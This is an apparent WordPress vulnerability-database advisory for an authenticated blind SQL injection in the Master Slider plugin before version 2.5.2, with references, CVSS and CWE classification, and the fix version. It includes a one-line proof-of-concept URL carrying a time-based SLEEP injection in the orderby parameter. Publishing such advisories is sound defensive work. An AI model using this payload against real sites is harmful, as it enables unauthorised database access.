Master Slider < 2.5.2 – Authenticated Blind SQL Injection

Description

The Master Slider – Responsive Touch Slider WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.

Proof of Concept

Open the below URL when logged with an account as low as editor

https://example.com/wp-admin/admin.php?page=master-slider&orderby=(SELECT%20*%20FROM%20(SELECT%20SLEEP(5))XXX)--%20-

Affects Plugins

master-slider

Fixed in 2.5.2

References

URL

http://cinu.pl/research/wp-plugins/mail_e4550983d80f61073b08bf87da1e442e.html

URL

http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

9.0 (critical)

Miscellaneous

Submitter

ethicalhack3r

Submitter twitter

ethicalhack3r

Verified

Yes

WPVDB ID

84f7b1b4-4176-446e-9042-6c176b4b553f

Timeline

Publicly Published

2015-08-20 (about 10 years ago)

Added

2015-11-22 (about 10 years ago)

Last Updated

2021-03-31 (about 5 years ago)

Other

Published

Title

Published

2023-01-12

Title

Easy Digital Downloads 3.1.0.2 & 3.1.0.3 - Unauthenticated SQLi

Published

2017-02-27

Title

NextGEN Gallery < 2.1.79 - Unauthenticated SQL Injection

Published

2020-11-20

Title

Anti-Spam by CleanTalk < 5.149 - Multiple Authenticated SQL Injections

Published

2019-08-12

Title

Give <= 2.5.0 - SQL Injection

Published

2025-06-24

Title

Homey <= 2.4.5 - Unauthenticated SQL Injection